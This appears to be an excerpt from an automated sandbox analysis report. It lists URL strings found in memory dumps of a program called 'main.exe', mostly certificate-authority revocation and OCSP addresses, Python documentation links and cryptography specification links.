Source: main.exe, 00000002.00000002.2016672801.000001E893301000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1988214568.000001E8945FE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2000314344.000001E893301000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1979172811.000001E8945FA000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972460986.000001E8945F6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2009080620.000001E893301000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: main.exe, 00000002.00000003.1994749135.000001E8938F4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2014252012.000001E893905000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2019046082.000001E89390D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2004789935.000001E8938FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl
Source: main.exe, 00000002.00000003.1973010642.000001E893A4D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1982186275.000001E893A5C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1978592500.000001E893A5B000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2011637912.000001E893A60000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2020289287.000001E893A60000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1995854538.000001E893A5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crlO
Source: main.exe, 00000002.00000003.1976823794.000001E8947EA000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972023696.000001E8947B2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1984378367.000001E8949FB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1971942361.000001E8949D7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1984162933.000001E8949D7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1989712594.000001E8947EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl
Source: main.exe, 00000002.00000003.1976823794.000001E8947EA000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972023696.000001E8947B2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1989712594.000001E8947EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.dhimyotis.com/certignarootca.crlHL
Source: main.exe, 00000002.00000003.1994749135.000001E8938F4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2014252012.000001E893905000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2019046082.000001E89390D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2004789935.000001E8938FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.securetrust.com/SGCA.crl
Source: main.exe, 00000002.00000003.2001802176.000001E894710000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1973551416.000001E894703000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976302124.000001E894703000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2005186988.000001E894727000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.securetrust.com/SGCA.crl0
Source: main.exe, 00000002.00000003.1994749135.000001E8938F4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2014252012.000001E893905000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2019046082.000001E89390D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2004789935.000001E8938FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.securetrust.com/SGCA.crl0t
Source: main.exe, 00000002.00000003.2004789935.000001E8938FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.securetrust.com/STCA.crl
Source: main.exe, 00000002.00000003.2001802176.000001E894710000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1973551416.000001E894703000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976302124.000001E894703000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2005186988.000001E894727000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: main.exe, 00000002.00000003.1994749135.000001E8938F4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2014252012.000001E893905000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2019046082.000001E89390D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2004789935.000001E8938FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl
Source: main.exe, 00000002.00000003.1979172811.000001E8945FA000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972460986.000001E8945F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: main.exe, 00000002.00000003.1994749135.000001E8938F4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2014252012.000001E893905000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2019046082.000001E89390D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2004789935.000001E8938FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0b
Source: main.exe, 00000000.00000003.1754671215.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753820338.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753335252.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754774783.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754921734.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754483691.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754995802.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754333997.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754059092.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: main.exe, 00000000.00000003.1754671215.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753820338.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753335252.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754774783.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754921734.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754483691.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754995802.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754333997.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754059092.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: main.exe, 00000000.00000003.1754671215.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753820338.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753335252.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754774783.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754921734.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754483691.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754995802.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754333997.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754059092.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: main.exe, 00000000.00000003.1754059092.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: main.exe, 00000000.00000003.1754671215.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753820338.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753335252.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754774783.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754921734.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754483691.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754995802.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754333997.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754059092.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: main.exe, 00000002.00000003.2003283799.000001E893A4E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2005040977.000001E893A57000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1973010642.000001E893A4D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2003795429.000001E894B9F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1994075095.000001E894B9C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2005756876.000001E894B9F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2006444585.000001E894BB5000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1982536657.000001E893A4E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://csrc.nist.gov/groups/ST/toolkit/BCM/documents/proposedmodes/eax/eax-spec.pdf
Source: main.exe, 00000002.00000003.1997906839.000001E894A82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972023696.000001E8947B2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2004907277.000001E8947DB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2006977893.000001E8947E4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972587068.000001E894A80000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2024203636.000001E8947E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38C/SP800-38C.pdf
Source: main.exe, 00000002.00000002.2025233362.000001E894ABD000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976534572.000001E894A92000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1981923054.000001E894ABA000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1993380178.000001E894ABB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2025105777.000001E894A56000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1973472828.000001E894A88000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1980229397.000001E894A53000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972587068.000001E894A80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38D/SP-800-38D.pdf
Source: main.exe, 00000002.00000003.1976534572.000001E894A92000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1980318164.000001E894A46000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2005241333.000001E894B14000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2003795429.000001E894B9F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1994075095.000001E894B9C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2012511330.000001E894A99000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2005756876.000001E894B9F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2006444585.000001E894BB5000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2025190061.000001E894A9C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2005844026.000001E894B17000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1993380178.000001E894AB6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2025066924.000001E894A49000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1973472828.000001E894A88000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972587068.000001E894A80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf
Source: main.exe, 00000002.00000002.2026739710.000001E895170000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://curl.haxx.se/rfc/cookie_spec.html
Source: main.exe, 00000002.00000002.2026373448.000001E894F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://docs.python.org/3/library/subprocess#subprocess.Popen.kill
Source: main.exe, 00000002.00000002.2026373448.000001E894F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://docs.python.org/3/library/subprocess#subprocess.Popen.returncode
Source: main.exe, 00000002.00000002.2026258242.000001E894E70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://docs.python.org/3/library/subprocess#subprocess.Popen.terminate
Source: main.exe, 00000002.00000002.2021431524.000001E893DF0000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000002.2022075360.000001E894270000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://docs.python.org/library/itertools.html#recipes
Source: main.exe, 00000002.00000003.1972543562.000001E893395000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.python.org/library/unittest.html
Source: main.exe, 00000002.00000002.2021431524.000001E893DF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://github.com/ActiveState/appdirs
Source: main.exe, 00000002.00000003.1973551416.000001E894703000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2002633127.000001E894703000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2023486431.000001E894703000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976302124.000001E894703000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2011999083.000001E894703000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://google.com/
Source: main.exe, 00000002.00000003.2001802176.000001E894710000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1973551416.000001E894703000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976302124.000001E894703000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2005186988.000001E894727000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2023563231.000001E89472A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://google.com/mail/
Source: main.exe, 00000002.00000003.1971266295.000001E894600000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972288327.000001E89460F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1980605217.000001E894618000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/json/
Source: main.exe, 00000002.00000002.2026890228.000001E895270000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://mail.python.org/pipermail/python-dev/2012-June/120787.html.
Source: main.exe, 00000002.00000003.1984796584.000001E89393F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1983914625.000001E89392F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1986673226.000001E89394D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1979828277.000001E89392A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.accv.es
Source: main.exe, 00000002.00000003.1984796584.000001E89393F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1983914625.000001E89392F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1986673226.000001E89394D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1979828277.000001E89392A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.accv.es-
Source: main.exe, 00000002.00000002.2024665951.000001E8948AE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1979213831.000001E8948A2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2014212164.000001E8948A4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1974002710.000001E8948A2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972023696.000001E8948A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.accv.es0
Source: main.exe, 00000000.00000003.1754671215.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753820338.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753335252.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754774783.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754921734.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754483691.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754995802.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754333997.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754059092.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: main.exe, 00000000.00000003.1754671215.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753820338.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753335252.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754774783.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754921734.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754483691.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754995802.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754333997.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754059092.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: main.exe, 00000000.00000003.1754671215.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753820338.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753335252.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754774783.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754921734.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754483691.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754995802.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754333997.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754059092.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: main.exe, 00000000.00000003.1754671215.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753820338.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753335252.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754774783.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754921734.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754483691.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754995802.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754333997.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754059092.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: main.exe, 00000002.00000002.2021431524.000001E893DF0000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000002.2021248839.000001E893CF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://opensource.apple.com/source/CF/CF-744.18/CFBinaryPList.c
Source: main.exe, 00000002.00000003.1994749135.000001E8938F4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1971266295.000001E894600000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1997567755.000001E89391F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2014252012.000001E893905000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2002779411.000001E894609000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2019046082.000001E89390D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2004789935.000001E8938FB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1983968227.000001E893914000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://repository.swisssign.com/
Source: main.exe, 00000002.00000003.1997567755.000001E89391F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1983968227.000001E893914000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://repository.swisssign.com/3
Source: main.exe, 00000002.00000003.1994749135.000001E8938F4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2014252012.000001E893905000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2019046082.000001E89390D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2004789935.000001E8938FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://repository.swisssign.com/p
Source: main.exe, 00000002.00000003.1994749135.000001E8938F4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2014252012.000001E893905000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2019046082.000001E89390D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2004789935.000001E8938FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://repository.swisssign.com/z
Source: main.exe, 00000002.00000002.2022075360.000001E894270000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://stackoverflow.com/questions/19622133/
Source: main.exe, 00000002.00000002.2026890228.000001E895270000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://timgolden.me.uk/python/wmi.html
Source: main.exe, 00000002.00000003.1972023696.000001E894815000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972808038.000001E894636000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2023049314.000001E894657000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1971266295.000001E894600000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972288327.000001E89460F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1979469125.000001E894657000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1989712594.000001E894815000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976470167.000001E89464B000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1987274468.000001E894815000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2003095511.000001E89483F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2006040169.000001E894657000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2006291215.000001E894846000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1979857009.000001E894815000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976823794.000001E894815000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc4880
Source: main.exe, 00000002.00000002.2025105777.000001E894A56000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1980229397.000001E894A53000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc5869
Source: main.exe, 00000002.00000002.2026739710.000001E895170000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
Source: main.exe, 00000002.00000003.1972971253.000001E894B59000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2003795429.000001E894B97000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1995890221.000001E894B91000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2001942358.000001E894B96000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1994813697.000001E894B65000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1988603631.000001E894B5A000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2000928411.000001E894B94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://web.cs.ucdavis.edu/~rogaway/ocb/license.htm
Source: main.exe, 00000002.00000002.2024665951.000001E8948AE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1984796584.000001E89393F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1979213831.000001E8948A2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2014212164.000001E8948A4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1983914625.000001E89392F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1974002710.000001E8948A2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1986673226.000001E89394D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972023696.000001E8948A2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1979828277.000001E89392A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
Source: main.exe, 00000002.00000003.1984796584.000001E89393F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1983914625.000001E89392F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1986673226.000001E89394D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1979828277.000001E89392A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl
Source: main.exe, 00000002.00000002.2024665951.000001E8948AE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1979213831.000001E8948A2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2014212164.000001E8948A4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1974002710.000001E8948A2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972023696.000001E8948A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
Source: main.exe, 00000002.00000003.1983968227.000001E893914000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.accv.es/legislacion_c.htm
